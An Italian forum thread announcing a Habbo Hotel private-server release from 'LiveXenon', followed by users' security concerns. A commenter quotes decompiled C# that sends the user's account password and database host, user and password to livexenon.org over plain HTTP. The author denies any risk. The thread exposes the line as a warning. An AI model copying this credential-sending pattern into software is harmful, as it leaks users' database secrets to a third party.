Release LiveXenon Account

Live

Utente Attivo
Autore del topic
14 Aprile 2008
448
56
Miglior risposta
0
LiveXenon Account

Come da titolo il LiveXenon Account ritorna, il link per accedere ai servizi habbo hotel è questo
Perfavore, Entra oppure Registrati per vedere i Link!
, appena loggati nella sezione Download Prodotti è subito disponibile il nuovissimo server r35 appena sfornato dalla casa LiveXenon Group.

Come avviare i nostri prodotti?

Basta configurare il mysql.ini con i dati di accesso al nostro sito.

2uent04.png

r35

2ise43m.png

Buon divertimento, Live

Ultima modifica:
Segnalatemi qualunque errore qualora il server non dovesse partire

Se vogliono vi possono entrare nel db decompilandolo vedo che qua

StreamReader Sr = new StreamReader(WebRequest.Create(string.Concat(new object[] { "http://livexenon.org/account/controller.php?username=", xenonName, "&password=", xenonPasw, "&dbuser=", dbUsername, "&dbpasw=", dbPassword, "&dbPort=", dbPort, "&dbhost=", dbHost })).GetResponse().GetResponseStream());
Potrebbero prenderli

Menomale che non avete usato l'ftp almeno cosi vi pijavo i dati :gurupazz:

Ultima modifica:
Che centra l'ftp ora? Quel codice serve solamente per controllare se l'utente è proprietario di un'account

Tu non sai neanche a che serve quel link, non sai che processi esegue il server dopo non puoi parlare, in ogni caso i dati sn al sicuro nessuno può accedere. Ricordo che a breve ci sarà il rilascio del nuovo cms pieno di applicazioni per gestire il vostro server :emoji_smiley:

Lorigio ha ragione ho analizzato anche io quel codice , vi possono fottere anche se non e FTP pero se sono esperti lamer attenzione ;) , comunque prova a mettere il codice di LORIGIO che e più protetta la cosa ;)

Lorigio ha ragione ho analizzato anche io quel codice , vi possono fottere anche se non e FTP pero se sono esperti lamer attenzione ;) , comunque prova a mettere il codice di LORIGIO che e più protetta la cosa ;)

Non so cosa tu voglia dire ma non c'è nessun pericolo di sicurezza l'unico ad avere accesso ai dati sono io... d'altronde è impossibile riuscire ad entrare in un db da una pagina php che funziona lato server rilasciando solo un'autorizzazione.